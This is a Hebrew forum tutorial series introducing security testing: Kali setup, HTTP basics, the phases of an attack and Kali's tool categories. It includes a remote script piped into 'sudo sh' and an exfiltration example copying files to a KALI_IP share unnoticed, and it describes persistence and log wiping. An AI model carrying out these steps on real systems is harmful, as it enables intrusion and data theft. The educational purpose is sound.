מדריך | אבטחת מידע (התחלה, עודכנו כלל המדרכים לשפה ברורה יותר, עידכון 0.0.11)

לנציצ

טוב (אני מקווה שיעבירו את הנושא למדריכים בהקדם)
אז ככה
הרבה אנשים שומעים על אבטחת מידע והאקינג אבל לא באמת יודעים מה עושים בתחום הזה ואיך מתחילים ללמוד אותו.

בסדרת המדריכים הזאת נלמד את הבסיס בצורה מעשית, החל מהתקנת סביבת העבודה ועד לעבודה עם כלים אמיתיים.

כדי לעקוב אחרי המדריך כדאי להכיר שימוש בסיסי בטרמינל.
ומי שלא מכיר שיכנס לנושא הזה אומנם זה נועד למשהו אחר, לימוד איך לתפעל קלוד קוד אבל הנושא די דומה ורוב הסבר שם הוא על הטרמינל בכללי
ועכשיו מגיעים לשלב שבו מתחילים את התקנות הראשונות
נכנסים לקישור הבא https://www.kali.org/get-kali/#kali-platforms
ומורידים את קאלי

בקישור שם יש אופציה או להוריד את התמונה של המערכת הפעלה או הורדה של מערכת הפעלה המתואמת למכונה וירטואלית,
יש העדפות לכאן ולכאן
מצד אחד יש יותר שליטה על התאמות בתמונה מצד שני יותר קל להתקין את המכונה המוכנה
אני במאמר הזה כותב רק על רק מוכנה מכונה כי אני לא העמקתי עד כה בתמונה של מערכת הפעלה

כפי שניתן לראות בתמונה יש ארבע סוגי מכונות
יש הבדלים בניהם אני ספיצפית התחלתי עם VirtualBox אבל אם אתם רגילים למכונה אחרת זה בסדר גמור ואפשר להוריד כל אחת שרוצים
שימו לב מדובר במוצר כבד תבדקו שיש מקום ושהמחשב יכול לסחוב את זה
אחרי הורדה תיגשו לאתר של המכונה שהורדתם
אצל מי שהוריד וירטאול בוקס זה קישור הבא https://www.virtualbox.org/
וכאן כמובן נכנסים לתוכנה של מכונה הוירטואלית

לוחצים על OPEN ומתחילים להגדיר את המיקום שאליו הורדנו את תמונת הדיסק המוכנה
אחרי זה יש כמה שאלות כמו כמה ליבות וזיכרון לתת למכונה וזה דברים שמשתנים ממחשב למחשב אז תבדקו לפי העניין
עוד שראיתי שכדאי זה לשנות את הגדרה הבאה
(במקרים רבים הגדלת זיכרון המסך תשפר את הביצועים הגרפיים של המכונה הווירטואלית. )
זה הדבר הזה להגביר את הזיכרון מסך

קליק על הדיספליי ולשנות
ועכשיו המכונה רצה
צריך לבחור סיסמה ושם משתמש מומלץ לבחור משהו קל אין סיבה למשהו קשה
שאני פחות מעוניין להסביר לכם עד הגנבה
יהיה קשה ויצטרכו להפעיל את הראש המון
וזהו המכונה שלכם רצה
בימים הקרובים יעלה המשך לדבר
חשוב לציין שאת רוב הידע שלי שאבתי מאבי סילביה
בתנאי ש @פראירי ו @cfopuser ו @מתכנת-חובב יעזרו לפחות בלתקן את הנזקים שאני עושה

מה למדנו?

מהי Kali Linux
מהי מכונה וירטואלית
איך מתקינים את Kali על VirtualBox
איך מתקינים את תעודת האבטחה של נטפרי

בפרקים הבאים נלמד איך עובדת סריקת אתרים, אילו סוגי מידע ניתן לאסוף, ואיך מקימים מעבדת תרגול בטוחה.

תיקון קטן עבור משתמשי נטפרי צריך תעודת אבטחה
בשביל להוריד את תעודת אבטחה הריצו בטרמינל את הפקודה הבאה

curl -sL https://netfree.link/cacert/united/x2/unix.sh | sudo sh

אוקי וקצת הסבר על הפקודה
curl הוא כלי שמאפשר לשלוח בקשות לשרתים ולהוריד מידע דרך שורת הפקודה.
-sL הs הוא מצב שקט (silent).
ה L מיועדת בשביל מעקב אחר הפניות שהכתובת URL תיתן לו
ואחרי זה יש לנו כתובת URL של נטפרי
מי שרוצה לבדוק מה הוא מוריד שיכתוב את כתובת לבד בדפדפן ויראה
ואחרי ה URL יש משהו שנקרא פיפ (לא יודע איך כותבים את זה)
שזה נראה ככה | כדי לעשות את זה לוחצים שיפט והמקש של הבקסלש ביחד
הסימן | מעביר את הפלט של הפקודה הראשונה ישירות לפקודה הבאה.
אחריו מגיע sudo
הsudo היא פקודה של תן לי הרשאה מנהל מערכת (הנקראת רוט)
כלומר המשתמש עכשיו רוצה לנהל את המערכת לכן תבקש ממנו שוב סיסמה ותוודא שהוא המנהל הבעלדי של המערכת
והדבר הבא זה sh
sh הוא מפרש פקודות (Shell). במקרה הזה הוא מריץ את הסקריפט שהתקבל מהפקודה הקודמת.
חשוב שתבינו משהו
כל הטרמינלים של לינוקס נגמרים בסיומת הזאת
ככה שנטפרי עשו את שגם יש לכם טרמינל מסוג זאש זה עדיין יעבוד לכם
עדכון נוסף
לבנתיים אני לא הצלחתי להתקין את נטפרי ולכן כרגע אני לא ימשיך עד לשחרור שלהם

לנציצ

שלום לכול מי שצופה ולומד
היום אני רוצה ללמד על פרוטוקול HTTPS

לפני שמתחילים לעבוד מול אתרים, חשוב להבין איך התקשורת בינם לבין הדפדפן עובדת.
כי כמעט כל כלי אבטחת מידע שעובד מול אתרים מתבסס על HTTP, ולכן חשוב להבין את הפרוטוקול לפני שמתחילים לעבוד עם הכלים עצמם.

HTTP (ראשי תיבות של HyperText Transfer Protocol) הוא הפרוטוקול הבסיסי המשמש לתקשורת בין דפדפנים, אפליקציות ושרתי אינטרנט. בכל פעם שנכנסים לאתר, שולחים טופס או משתמשים ב־API, מתבצעת למעשה תקשורת באמצעות HTTP.

העיקרון פשוט: הלקוח (לדוגמה דפדפן(לסוגיו השונים)) שולח בקשה (Request) לשרת, והשרת מחזיר תגובה (Response). לדוגמה, כאשר מבקשים דף אינטרנט, הדפדפן שולח בקשת GET והשרת מחזיר את תוכן הדף יחד עם מידע נוסף כגון סוג התוכן וקוד הסטטוס.
ויש מספר קודים המסייעים לדפדפן להבין את התוצאה למשל 200 מדווח על הצלחה ו404 על כישלון
לרשימת קודים תכנסו לקישור הבא כאן
HTTP כולל מספר שיטות נפוצות, בהן GET לקבלת מידע, POST לשליחת מידע לשרת,
GET משמש בדרך כלל לבקשת מידע מהשרת, בעוד POST משמש לשליחת מידע לשרת.

דוגמה:

כאשר אתם נכנסים לכתובת:
https://example.com/login

הדפדפן שולח בקשת GET כדי לקבל את עמוד ההתחברות.

לאחר שאתם ממלאים שם משתמש וסיסמה ולוחצים התחבר,
הדפדפן שולח בקשת POST שמכילה את הנתונים שהזנתם.

מאפיין מרכזי של HTTP הוא שהוא Stateless(סטסלאס), כלומר כל בקשה מטופלת באופן עצמאי והשרת אינו חייב לזכור בקשות קודמות. מסיבה זו משתמשים לעיתים במנגנונים כמו Cookies כדי לשמור מידע בין בקשות שונות.
כלומר אין הגיון שבכל שליחת פוסט לאתר פה נצטרך להזין מחדש את הסיסמה לכן יש עוגיות ששומרות את זהוי שלנו(ID) בתוך עוגיה
אבל זה בהכרח דווקא זהוי אלא פעמים רובות זהוי והרבה פעמים זה אחר בכלל
כלומר בוא וניתן פה אנלוגיה לחיים עצמם
נניח ופגשתם קרוב משפחה שלכם ואתם שואלים אותו אם הוא יכול לבוא להתארח אצלכם השבת? והוא עונה השבת אני צריך להיות בצד השני (יש שם שבת חתן) ואז אתם אומרים לו ומה לגביי השבת שאחרי? והוא עונה שבת אחרי אני יכול
עכשיו אם תיגשו אליו ותגידו לו מיד
מה לגביי השבת שאחרי? והוא לא יבין מה אתם רוצים ממנו
אותו דבר גם ב־HTTP. כל בקשה מגיעה כאילו היא הראשונה, אלא אם משתמשים במנגנון כמו Cookies שמאפשר לזהות את המשתמש בין בקשות שונות.
בהמשך הסדרה נראה כיצד כלים שונים משתמשים בעוגיות כדי לגשת לעמודים פנימיים באתר.

כדי שהדפדפן יידע לאיפה להגיע המרחבי האינטרנט יש URL
URL הוא הכתובת של המשאב באינטרנט, למשל כתובת של אתר, תמונה או קובץ.
ועכשיו מי שיבדוק ממה עשוי URL שבו גולש כרגע יגלה שהוא גולש דרך HTTPS
אז מה זה הS ???
ה־S שבסוף HTTPS מייצגת את המילה Secure (מאובטח)
האות S מציינת שהתקשורת בין הלקוח (למשל הדפדפן) לבין השרת מוצפנת באמצעות פרוטוקול TLS (בעבר SSL). ההצפנה נועדה למנוע מגורמים בדרך לקרוא או לשנות את המידע המועבר.
לדוגמה, כאשר מתחברים לאתר באמצעות HTTP רגיל, אדם בעל גישה לתעבורת הרשת עשוי לראות את המידע שעובר. לעומת זאת, ב־HTTPS הנתונים מוצפנים, כך שגם אם מישהו יירט את התעבורה, הוא לא יוכל להבין את תוכנה
וחשוב לזכור
HTTPS אינו מצפין רק סיסמאות, אלא את כל התקשורת בין הדפדפן לשרת.

לערך המורחב על הפרוטוקול כאן

עד כאן להיום

מה למדנו היום?

✓ מהו HTTP
✓ מהו Request ומהו Response
✓ מה ההבדל בין GET ל־POST
✓ מהו Stateless
✓ מה תפקידן של Cookies
✓ מה מוסיף HTTPS לעומת HTTP

בפרק הבא נתחיל להכיר את מפת התקיפה ונבין כיצד נראית בדיקת אבטחה של אתר.

לנציצ

הוספתי סקר בהתחלה אשמח אם תוכלו לענות כדי שאדע
את מידת התעניינות של הציבור בנושא

חייא שיאומי

פוסט זה נמחק!

לנציצ

לפני שמתחילים ללמוד כלים וטכניקות, חשוב להבין איך נראית תקיפה טיפוסית של מערכת מחשב. התמונה הבאה מציגה את השלבים העיקריים בתהליך.
חשוב להבין שלא כל תקיפה עוברת בכל השלביםשמוצגים פה, ולא תמיד לפי הסדר הזה. המטרה של התרשים היא להציג את התהליך הכללי.
אז בוא נתחיל

יש לנו כאן תמונה שנותנת לנו המבט על איך מתבצעת התקיפה
אנחנו מתחילים בצורה יחסית פשוטה שהוא בעצם מפוצל ל2

הוא באמצעות חיפוש הכי פשוט על דפי האתר
אתם מתחילים את החיפוש עוברים אחד אחד אז מה בעצם אנחנו מחפשים שם
לפעמים יש רשימת שמות של העובדים לפעמים גם כתובות מייל של חלקם ועוד... ומה הרווח? התשובה היא שאם יש לך כתובות מייל או שמות יש לך חלק (לכאורה חלק משמות המשתמשים של המערכת) ומה עוד לפעמים אתה רואה שמות שמשמשים את האנשי הארגון בפרומים שונים ובטעות הם שואלים על המערכת שלהם ואז אני כבתור תוקף יודע על הגרסה של המערכת שלהם וגם את הפגיעות שלה
יש עוד אופציה לאסוף הכי פסיבי שאפשר כלומר לא להיכנס לאתר אלא להציץ דרך החיפוש
ובשתי השיטות אנחנו לא נכנס לרמה גבוהה שיכולה להראות שאנחנו לא אזרחים תמימים חיפוש שגרתי ולא מחשיד בלבד

אחרי שמיפינו את הארגון מבחוץ ואספנו כל פיסת מידע גלויה ללא מגע ישיר, הגיע הזמן 'לגעת' במערכת בצורה מבוקרת כדי לחפש את הדלתות והחלונות שנותרו פתוחים.

נעבור לאיור 2
בשלב הזה עולים רמה ואנחנו כבר צריכים להסתתר על הסתתרות ועוד נדבר אחרי זה
(לא מבטיח קצת מסוכן מידי ואני לא יודע איזה ילדון יראה את החומר הזה)
כאן אנחנו מתחילים בסריקה של שמות משתמשים שחוזרים אלינו כאמיתים
וסורקים את מבנה האירגון כלו בצורה מאוד אגרסיבית
ועוברים לבדיקת כתובות IP ומחפשים פורטים פתוחים
מה אנחנו מצפים למצוא בשלב הזה
גרסאות מדויקות של המערכת (והפעם בודקים בגוגל, יש מצב שהספריה שהם בחרו חלשה, ויש חולשות בכל מקום, לאנשי אבטחה תמיד יש שגיאות, וזה עולה ביוקר)
מחפשים תיקיות פתוחות (יתכן ונמצא שם כל מיני פרטים שלא כל איש אמור לראות)

כעת, כשיש בידינו מפת דרכים מדויקת של פורטים, גרסאות ופרצות פוטנציאליות, אנחנו עוברים מהשלב התיאורטי לשלב המעשי – הניסיון לפרוץ את קו ההגנה הראשון ולהשיג דריסת רגל ראשונית בשרת.

כאן העניין נהפך ללא חוקי בכלל
אין לי אחריות על שום דבר שתבצעו ואני מזהיר אל תנסו, יתפסו אותכם בסוף
זה אסור בתכלית האיסור
גם לבדוק פגיעיות צריך אישור מראש

אז בשלב הזה
אנחנו מנסים להשיג גישה לא מורשת לשרת האינטרנט של האתר
אם זה בגלל שיש לנו קוד של משתמש שבטעות פורסם במקום לא נכון ובין אם זה ניצול פגיעות של הגרסא שמפעילה את האתר
או סתם פורט שנשאר פתוח במקרה

להיכנס פנימה כמשתמש פשוט זה נחמד, אבל זה לא מספיק כדי לשלוט במערכת; בשלב זה המטרה היא למצוא חולשות פנימיות שיאפשרו לנו להפוך למנהלי מערכת (Root/System) בעלי כוח מוחלט.

בשלב הבא
פה המטרה היא ולנסות לעלות את רמת הרשאות שלנו, עד לרמה הגבוהה שהיא משתמש רוט בשרת לינוקס או משתמש הסיסטם בשרת הווינדוס

ברגע שהשגנו הרשאות מלאות, אנחנו לא רוצים לאבד אותן אם השרת יאותחל או אם הפירצה המקורית תיסגר; זה הזמן לשתול 'דלת אחורית' שתבטיח לנו כניסה חלקה בכל זמן שנרצה.

שלב הבא
פה אנחנו יוצרים מקום לכניסה קבועה שלנו על מנת שלא נצטרך בכל פעם לעבור את התהליך כולו
כלומר המטרה היא לשמור על גישה למערכת גם אם הסיסמה תוחלף או שהחיבור הנוכחי ייסגר.
אם בגלל גלוי שלכם וכדומה

כשהמעמד שלנו בשרת יציב ומאובטח, הנוף משתנה לחלוטין – אנו מנצלים את ההרשאות החדשות כדי לבצע סריקה עמוקה של דפים וקבצים שהיו חסומים בפנינו קודם לכן.

שלב הבא
פה מתחיל קטע אחר כבר נכנסנו פנימה, ויש לנו יותר הרשאות
ובגלל שיש לנו יותר הרשאות, יש לנו גישה ליותר דפים ודברים ולכן נרצה לסרוק שוב את האתר (כמובן שאפשר לסנן את מה שכבר גילנו לפני זה)

השרת הנוכחי הוא רק נקודת הזינוק; כעת אנו משתמשים בו כבסיס כדי לצאת אל תוך הרשת הפנימית של הארגון, למפות מחשבים ושרתים נוספים, ולשחזר את תהליך הפריצה גם עליהם.

שלב הבא
בארגונים שרת אחד בדרך כלל מחובר לעוד שרתים ומחשבים פנימיים. לכן לאחר שמקבלים גישה לשרת אחד, מנסים לבדוק האם ניתן להגיע ממנו למערכות נוספות.

פה אספנו כבר מידע מתוך הרשת הפנימית של השרת ויש מצב והוא מחובר למחשבים נוספים ואנחנו ממפים את המחשבים החדשים והנוספים ומנסים לבדוק את החולשות שלהם
ואם הצלחנו למצוא שרת / מחשב נוסף שוב ננסה להשיג הרשאות מתקדמות יותר ושוב לסרוק ושוב לחפש מחשבים חדשים חוזר חלילה

לאחר שמיפינו והשגנו שליטה על נכסי המפתח ברשת, הגענו לנקודת ההכרעה: כאן מתפצלות הדרכים בין תוקף זדוני שמבצע נזק או הצפנה, לבין בודק חדירות שמגבש את הוכחת היכולת עבור הארגון.

שלב הבא
בשלב הזה המסלול מתפצל לפי מטרת התוקף.
אם אתם אקרים כובע שחור אתם מנסים להצפין את השרת או לבצע נזקים אחרים
ואם אתם בודקי חדירות אתיים אתם רוצים להראות להארגון את הנזק הפונטצאלי אז אתם פשוט מסכמים את המידע ושולחים

הפעילות בתוך הרשת משאירה סימנים, וכדי לסיים את העבודה בצורה מקצועית (או חשאית), עלינו לחזור אחורה ולמחוק כל זכר לפעילות שלנו – החל מקבצי לוג ועד לסקריפטים שהרצנו.

שלב הבא
הוא להסתיר את מה שעשינו החל ממחיקת הלוגים וכלה במחיקת סקריפטים זדונים

בשלב האחרון, כשהרשת נקייה ומאובטחת חזרה, בודק החדירות אוסף את כל הממצאים, מתעד את שרשרת התקיפה ומכין את הדוח המשלים שיעזור לארגון לסגור את הפרצות לצמיתות.

השלב הבא
הוא מיועד לבודקי חדירות
פשוט עושים את הבדיקה האחרונה ומסכמים ושולחים לחברה

לסיכום:

1. אוספים מידע.
2. מבצעים סריקות.
3. מנסים להשיג גישה.
4. מעלים הרשאות.
5. שומרים גישה.
6. מרחיבים את השליטה למערכות נוספות.
7. מבצעים את מטרת התקיפה.
8. מסכמים או מסתירים עקבות.

בפרקים הבאים נתחיל ללמוד כל אחד מהשלבים האלה בנפרד.

ושוב קרדיט לתמונה אבי סלביה

מה למדנו היום?

✓ מהם השלבים העיקריים של תקיפה.
✓ מה ההבדל בין איסוף מידע, סריקה וניצול חולשות.
✓ כיצד תוקפים מתקדמים בתוך רשת ארגונית.
✓ מה ההבדל בין תוקף זדוני לבודק חדירות.

חייא שיאומי

פוסט זה נמחק!

10110000

פוסט זה נמחק!

לנציצ

@חייא-שיאומי פליז תעבור לכאן
https://mitmachim.top/topic/97710/הסבר-תגובות-למדריך-על-האבטחת-מידע
אני רוצה מדריך נקי אז תמחק את הודעות שלך

לנציצ

בפוסט הקודם ראינו את מפת התקיפה.
עכשיו נסתכל על תפריט Kali ונראה כיצד הכלים השונים מחולקים לפי שלבי התקיפה שראינו.

חשוב להבין:
רוב הכלים שמופיעים כאן יכולים לשמש גם להגנה וגם לתקיפה.

בפוסט הזה לא נלמד להפעיל אותם,
אלא רק נבין למה הם משמשים.

כדי להבין טוב יותר את תפריטי קאלי הכנתי סיכום קצר של כל קטגוריה ומה המטרה שלה.
מדובר בתפריט של המערכת כאשר אנחנו נכנסים למערכת קאלי
יש לנו את התפריט הבא

הלחצן התחל מוקף בעיגול
ואז יש לנו רשימה ארוכה שמופיעה
בבתחלה מפורט על
מסומנים בכוכב
האחרונים שהשתמשנו
כל האפליקציות
ואז את האפליקציות בשימוש הסטדרט כמו דפדפן וכולי
ואז יש לנו רשימה מ1 -16 שבהם מופרטים כמה וכמה דברים
ובדבר הזה ביצעתי סיכום עם AI
שימו לב על כל כלים שיש ברשימה מהיום נדבר מפה
לא יהיו עוד הסברים אלא פשוט שימוש בכלים בגישה ישירה
והסבר תמיד יהיה פה
אז בהנאה

01 - Reconnaissance (סיור ואיסוף מידע מקדים)
זהו הצעד הראשון בכל מבדק חדירה. לפני שנוגעים במקלדת, התוקף חייב לאסוף כמה שיותר מידע פומבי וגלוי על המטרה (כתובות מייל של עובדים, דומיינים, כתובות IP, וטכנולוגיות שבהן החברה משתמשת). שלב זה מוגדר כאיסוף מידע פסיבי (מבלי שהארגון ישים לב שמחפשים עליו).

maltego:

theharvester:

spiderfoot:

️ ראש בראש בקטגוריה:
maltego מול theharvester: בעוד ש-theharvester מעולה לשליפה מהירה ופשוטה של רשימת מיילים לתוך קובץ טקסט (למשל לצורך קמפיין פישינג בשלב 03), maltego לוקח את המידע ומציג אותו בצורה גרפית מורכבת שמאפשרת לחקור קשרים עמוקים בין אנשים לחברות ושרתים.

הטוב מכולם: spiderfoot – בזכות האוטומציה המלאה שלו. הוא מסוגל לחסוך ימים של עבודה ידנית ולספק תמונה היקפית מדהימה על נכסי הארגון בלחיצת כפתור אחת.

02 - Resource Development (פיתוח והכנת משאבים)
בשלב זה התוקף כבר יודע על מי הוא מגן או תוקף, וכעת הוא מכין את כלי הנשק שלו. זה כולל יצירת קבצים זדוניים (Payloads), קניית דומיינים מתחזים, או הגדרת שרתים שישמשו אותו בהמשך.

msfvenom:

legion:

הטוב מכולם: msfvenom. הכלים האחרים בקטגוריה הם כלי עזר ניהוליים, אך msfvenom הוא המפעל שמייצר את "חומרי הנפץ" הדיגיטליים עבור התוקף. ללא היכולת לייצר קוד מותאם אישית, לא יהיה מה להריץ בשלבים הבאים.

03 - Initial Access (החדירה הראשונית)
בשלב זה המטרה של התוקף היא למצוא פרצה (כמו חולשה באתר או שרת) ולהשתמש בה כדי להשיג רגל ראשונה בתוך הארגון.

sqlmap:

commix:

dns-rebind:

gophish:

metasploit-framework:

setoolkit (Social-Engineer Toolkit):

️ ראש בראש בקטגוריה:
sqlmap מול commix: שניהם כללי הזרקה אוטומטיים, אך sqlmap מיועד אך ורק לבסיסי נתונים, בעוד commix נועד להרצת פקודות ישירות על שרת האינטרנט.

gophish מול setoolkit: בעוד ש-gophish מצוין לניהול קמפיין פישינג רחב במיילים לארגון שלם, setoolkit מגוון בהרבה ומאפשר לייצר את התוצרים הזדוניים עצמם (כמו שיבוט אתרים מורכב).

הטוב מכולם: metasploit-framework. מדובר ב"ענק" של עולם הפריצה. הגמישות שלו, כמות האקספלויטים והיכולת שלו לשמש גם בשלבים מתקדמים הופכים אותו לכלי החובה לכל תוקף.

04 - Execution (הרצת קוד)
אחרי שמצאנו פתח, אנחנו צריכים לגרום למחשב של הקורבן להריץ את הקוד הזדוני שלנו בפועל.

metasploit-framework:

powersploit:

הטוב מכולם: powersploit. בסביבות ארגוניות מודרניות מבוססות Windows, היכולת של PowerSploit להריץ קוד זדוני באמצעות הכלים המובנים של מערכת ההפעלה (Living off the Land) הופכת אותו לקטלני וקשה מאוד לזיהוי.

05 - Persistence (ביסוס אחיזה)
אם המשתמש יכבה את המחשב, אנחנו עלולים לאבד את הגישה אליו. כאן אנחנו משתילים "דלת אחורית" כדי להבטיח שנוכל לחזור מתי שרק נרצה.

laudanum:

webshells:

weevely:

הטוב מכולם: weevely. בניגוד ל-Web Shells פשוטים וסטטיים שמתגלים בקלות על ידי חומות אש, weevely מייצר תקשורת מוצפנת ומעורבלת, ומספק לתוקף ממשק שליטה נוח ומתקדם כמו טרמינל אמיתי.

06 - Privilege Escalation (העלאת הרשאות)
לרוב, כשפורצים למערכת, נכנסים כמשתמש פשוט ומוגבל. בשלב זה המטרה היא להפוך ל"אלוקים" של המערכת – משתמש Administrator בווינדוס או Root בלינוקס.

linpeas:

winpeas:

peass:

metasploit-framework:

unix-privesc-check:

הטוב מכולם: linpeas / winpeas. הסקריפטים ממשפחת PEASS הם פשוט יצירת אמנות. הם צובעים את הממצאים בצבעים (אדום בוהק מצביע על חולשה של 99% להעלאת הרשאות), חוסכים שעות של עבודה ידנית ומעודכנים לטכניקות הכי חדשות בשטח.

07 - Defense Evasion (התחמקות ממנגנוני הגנה)
כדי שלא יתפסו אותנו, אנחנו חייבים לעקוף אנטי-וירוסים, מערכות EDR וחומות אש.

msfvenom:

exe2hex:

macchanger:

Pass-the-Hash

הטוב מכולם: msfvenom. הכלי החיוני ביותר ליצירת ה"ווירוסים" עצמם. היכולת שלו לשלב הצפנות, לשנות פורמטים ולהזריק קוד זדוני לתוך קבצים לגיטימיים הופכת אותו ללב תעשיית התחמקות ההגנות ב-Kali.

08 - Credential Access (השגת סיסמאות)
מי צריך לחפש חולשות מורכבות אם אפשר פשוט להשיג את שם המשתמש והסיסמה של המנכ"ל?

hashcat:

john (John the Ripper):

hydra:

responder:

crunch:

️ ראש בראש בקטגוריה:
hashcat מול john: שניהם מפצחים סיסמאות אופליין. john קל ופשוט יותר להפעלה ראשונית, אך hashcat מהיר ממנו באלפי מונים ברגע שמחברים לו כרטיס מסך חזק.

הטוב מכולם: responder. בעוד שכלים אחרים דורשים ממך לנחש סיסמאות במשך ימים, responder פשוט יושב ברשת, "עובד" על המחשבים בארגון, ומביא לך סיסמאות ארגוניות על מגש של כסף תוך דקות ספורות ללא מאמץ.

09 - Discovery (מיפוי וסריקה)
כאן התוקף פוקח עיניים ומסתכל סביבו: אילו עוד מחשבים, שרתים ומכשירים נמצאים איתו ברשת הפנימית?

nmap:

zenmap:

masscan:

wireshark:

arping / netdiscover:

הטוב מכולם: nmap. כלי שהוא תעשייה שלמה. אי אפשר להתחיל שום משימת סייבר (תקיפה או הגנה) בלעדיו. מנגנון ה-NSE (סקריפטים מובנים) שלו מאפשר לו לא רק לסרוק פורטים אלא גם לגלות חולשות קריטיות באופן אוטומטי.

10 - Lateral Movement (תנועה רוחבית)
לאחר שפרצנו למחשב אחד (למשל של הפקידה בקבלה), אנחנו רוצים "לדלג" למחשבים אחרים ברשת עד שנגיע ליעד הנחשק – שרת המידע המרכזי או שרת ה-Domain Controller.

evil-winrm:

impacket-psexec / smbexec:

rdesktop / xfreerdp3:

הטוב מכולם: evil-winrm. כלי מודרני, יציב בטירוף, שעוקף בקלות המון מנגנוני הגנה ומאפשר להעלות קבצים, להריץ סקריפטים בזיכרון ולנהל את שרת ה-Windows המרוחק בנוחות מקסימלית.

11 - Collection (איסוף המידע)
הגענו למטרה! מצאנו את השרתים הרגישים, וכעת אנחנו רוצים לרכז, ליירט ולאסוף את המידע הסודי (קבצים, תכתובות, סיסמאות).

mitmproxy:
sslsplit:

ettercap-pkexec:

ssldump:

הטוב מכולם: mitmproxy. בעולם שבו הכל מבוסס על אפליקציות ואינטרנט, הממשק הנוח שלו והיכולת לפרק, לקרוא ולערוך בקשות HTTPS הופכים אותו לכלי העבודה המושלם לאיסוף מידע ויירוט נתונים.

12 - Command and Control (פיקוד ושליטה - C2)
במקום לעבוד מול כל מחשב בנפרד, אנחנו מקימים "מפקדה מרכזית" (שרת C2) שמנהלת את כל המחשבים שפרצנו אליהם באופן אוטומטי.

powershell-empire (Empire):

starkiller:

metasploit-framework:

הטוב מכולם: השילוב של powershell-empire + starkiller. זהו שילוב ברמה של קבוצות תקיפה מתקדמות (APT). השילוב בין מנוע ה-C2 העוצמתי של Empire לבין הנוחות הוויזואלית של Starkiller נותן לתוקף שליטה מלאה ומבט על על כל המבצע הארגוני שלו.

13 - Exfiltration (הברחת המידע החוצה)
אספנו את החומר הסודי, וכעת אנחנו צריכים להוציא אותו ממחשבי הארגון החוצה אל המחשב האישי שלנו, מבלי שמערכות הניטור ישימו לב.

impacket-smbserver:

netcat (nc):

הטוב מכולם: impacket-smbserver. בסביבת Windows ארגונית, הכלי הזה מנצח בגדול. הוא מאפשר לתוקף להשתמש בפקודת ההעתקה המובנית של ווינדוס (כמו copy file.txt \KALI_IP\share) – פעולה שנראית לגיטימית לחלוטין ברשת ולא מדליקה נורות אדומות במערכות האבטחה הארגוניות.

14 - Impact (שיבוש והרס)
השלב שבו התוקף מפסיק להתחבא ומבצע פעולות גלויות שמטרתן לשבש, להרוס או למנוע שירות מהארגון (למשל, תקיפות כופר או מחיקת מערכות).

scapy:

15 - Forensics (חקירה דיגיטלית ופורנזיקה)
כאן אנחנו מחליפים כובע! עברנו לצד של המגנים (הצוות הכחול). כלים אלו נועדו לחקור מחשבים, דיסקים וזיכרונות לאחר פריצה, כדי להבין מה קרה ולמצוא ראיות.

autopsy:

binwalk / binwalk3:

bulk_extractor: סורק מהיר במיוחד השולף ישירות מחומרי הגלם של הדיסק תבניות טקסט כמו כתובות מייל, מספרי כרטיסי אשראי וכתובות IP, גם אם מערכת הקבצים מושחתת.

hashdeep:

הטוב מכולם: autopsy. זהו התקן המקצועי המשמש חוקרים במשטרה ובחברות פרטיות. היכולת שלו לרכז את כל שלבי החקירה תחת קורת גג אחת, להציג את הממצאים בצורה ויזואלית ולהפיק דוח קביל משפטית הופכת אותו לכלי החובה בפורנזיקה.

16 - Services and Other Tools (ניהול המערכת)
קטגוריית התמיכה והתחזוקה הפנימית של מערכת ההפעלה Kali Linux.

Kali Tweaks:

PowerShell:

Root Terminal Emulator:

תרשים זרימה

שלב 1-2: אוספים מידע (Recon) ומכינים את הקבצים הזדוניים (Resource Development).

שלב 3-5: חודרים לארגון (Initial Access), מריצים פקודות (Execution) ומשתילים דלת אחורית (Persistence).

שלב 6-8: עוקפים את האנטי-וירוס (Defense Evasion), הופכים למנהלי מערכת (Privilege Escalation) וגונבים סיסמאות של משתמשים אחרים (Credential Access).

שלב 9-11: סורקים את שאר הרשת (Discovery), מדלגים למחשבים של ההנהלה (Lateral Movement) ואוספים את החומרים הסודיים ביותר (Collection).

שלב 12-14: מנהלים הכל משרת מרכזי (C2), מבריחים את הקבצים החוצה (Exfiltration) או משבשים את פעילות החברה (Impact).

בהצלחה מחכה לתגובות כאן

ועוד משהו אחד
חברה מה שיש פה זה ספר טלפונים ברמה מסיומת
הוא לא מתיימר להביא את הפירוט על כל כלי
אלא לתת היכולת התנסות עצמית במערכת
ואין לראות בספוילרים של הטוב מכולם, או ראש בראש, המלצה מסיומת
לכל פעולה נדרשים כלים שונים ו
הסבר הניתן כאן הוא עבור הכלים המומלצים ביותר
אך יתכנו משימות עם כלים אחרים
כלומר המטרה של הפוסט הזה אינה ללמוד את הכלים עצמם.

המטרה היא להבין כיצד Kali מסדרת את הכלים לפי שלבי העבודה.

מהיום, בכל פעם שנשתמש בכלי חדש,
נוכל לדעת לאיזו קטגוריה הוא שייך
ואיזה תפקיד הוא ממלא בתהליך.

ועוד משהו בהתאם לתרשים זרימה אפשר לראות את התמונה הזאת שהסברתי למעלה מתבהרת

מה למדנו היום?

✓ כיצד Kali מחלקת את הכלים לפי שלבי התקיפה.
✓ מה המטרה של כל קטגוריה מרכזית.
✓ כיצד למקם כלי בתוך תהליך עבודה שלם.
✓ מדוע חשוב להבין את המתודולוגיה לפני שלומדים כלים.

לנציצ

עד עכשיו דיברנו בעיקר על תיאוריה. היום נקים סביבת תרגול אמיתית שבה נוכל ללמוד ולבדוק חולשות בצורה בטוחה וחוקית.

אז ככה היום נסביר על הקמת אתר פגיע אנחנו נכנסים לדפדפן
ברירת המחדל בקאלי, פרייפוקס וכותבים https://vwad.owasp.org/
למידע נוסף תכתבו בגוגל owasp והוא ייתן לכם את המידע
OWASP הוא ארגון בינלאומי ללא מטרות רווח העוסק בקידום אבטחת יישומי ווב ומפרסם חומרי לימוד, כלים ופרויקטים קהילתיים.
ויש גם גיטאהב שנותן את המידע לאתגרים הטובים ביותר של השנה
אוקיי אז נכנסנו לאתר והוא נראה ככה

יש בו אתגר אקראי לחלוטין יש מצב שאתם תיראו משהו אחר בכלל
בכל אופן גוללים קצת למטה
ויש שם תיבת חיפוש עם פרמטרים

זה התיבה יש כאן פרמטר של איזה צורה אונליין או דווקא אופליין ודוקר וכולי
ועוד תיבה של שבה יש פרמטר האם המשחק יהיה מרובה משתתפים או אתגר סולו
ואנחנו רוצים את אתגר הבא

למה דווקא Mutillidae?

קיימות מספר מעבדות פגיעות ללימוד אבטחת מידע, כגון DVWA, OWASP Juice Shop ו-Mutillidae.

